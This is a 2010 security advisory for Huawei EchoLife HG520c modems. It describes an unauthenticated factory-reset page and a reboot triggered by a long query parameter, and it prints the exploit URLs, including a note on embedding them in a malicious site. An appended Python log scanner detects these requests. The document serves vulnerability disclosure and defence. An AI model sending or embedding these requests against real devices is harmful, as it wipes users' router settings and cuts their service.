High May 13, 2010

Huawei EchoLife HG520c Denial of Service & Unauthorized Factory Reset

Huawei EchoLife HG520c modems expose an unauthenticated factory-reset endpoint and an authenticated remote reboot page, letting an attacker on the LAN or via a malicious website disrupt service and wipe the device configuration.

CVSS Score: 7.7 / 10.0
Severity: High
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Advisory

Device: Huawei EchoLife HG520c
Firmware: 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4
Software: V100R001B120Telmex, V100R001B121Telmex
Websec Advisory: WS10-09

Description #1 — Unauthenticated Factory Reset

The page /AutoRestart.html restores the default configuration and reboots the device. It does not require authentication.

Exploit #1

From the LAN (or client-side with the page embedded in a malicious site):

http://192.168.1.254/AutoRestart.html

If the remote admin interface is enabled:

https://<router-wan-ip>/AutoRestart.html

Description #2 — Authenticated Remote Reboot

The page /rpLocalDeviceJump.html reboots the device when the index query parameter exceeds seven characters. The request requires an authenticated session.

Exploit #2

http://192.168.1.254/rpLocalDeviceJump.html?index=HAKIM.WS

Remediation

Disable WAN-side HTTP administration. No vendor patch available.
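
A log check for the two requests described above, as an added example that is not part of the original advisory. It assumes forward-proxy or web-filter logs in a combined-log-style format with absolute URLs; the sample lines, the function names and the host example.test are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed log layout: client, timestamp, request line, status, size, referer.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)

def classify(line):
    """Return (client, finding, cross_site) for a request of interest, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    path = url.path.lower()  # compare case-insensitively to be conservative
    finding = None
    if path == "/autorestart.html":
        # Any hit matters: the advisory says this page needs no authentication.
        finding = "factory-reset"
    elif path == "/rplocaldevicejump.html":
        # Only an index value longer than seven characters triggers the reboot.
        values = parse_qs(url.query, keep_blank_values=True).get("index", [])
        if any(len(v) > 7 for v in values):
            finding = "reboot-long-index"
    if finding is None:
        return None
    # A Referer on another host suggests the request was embedded in a web page.
    ref_host = urlsplit(m["referer"]).hostname
    cross_site = None not in (ref_host, url.hostname) and ref_host != url.hostname
    return (m["client"], finding, cross_site)

def scan(lines):
    """Collect findings from an iterable of log lines."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines, not taken from a real device or network.
SAMPLE_LOG = [
    '192.168.1.23 - - [13/May/2010:10:00:01 +0000] "GET http://192.168.1.254/AutoRestart.html HTTP/1.1" 200 512 "http://example.test/page.html"',
    '192.168.1.40 - - [13/May/2010:10:02:10 +0000] "GET http://192.168.1.254/rpLocalDeviceJump.html?index=AAAAAAAA HTTP/1.1" 200 128 "-"',
    '192.168.1.40 - - [13/May/2010:10:03:00 +0000] "GET http://192.168.1.254/rpLocalDeviceJump.html?index=1 HTTP/1.1" 200 128 "http://192.168.1.254/index.html"',
]

if __name__ == "__main__":
    for client, finding, cross_site in scan(SAMPLE_LOG):
        print(client, finding, "cross-site" if cross_site else "direct/same-site")
```

A cross-site hit on the factory-reset path points at the client whose browser loaded the embedding page, which is where follow-up should start.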
